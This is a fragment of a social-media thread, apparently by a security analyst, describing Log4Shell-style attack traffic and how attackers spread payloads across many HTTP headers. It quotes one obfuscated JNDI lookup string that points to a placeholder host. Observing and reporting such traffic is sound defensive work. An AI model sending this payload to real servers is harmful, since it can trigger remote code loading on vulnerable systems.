Conversation

On the other hand, number of distinct IPs is roughly stable. The increase of malicious requests/IP can be explained by the fact that IPs are trying different payloads.
Image
1
Replying to
or Mozilla ${jndi:${lower:l}${lower:d}a${lower:p}://xxx.xxx.com/a}. Attackers attempt to go trough by testing all headers, ranging from User-Agent, Accept-Encoding to Cache-Control or Pragma. Even less common headers like X-Requested-With are used by attackers.
1
1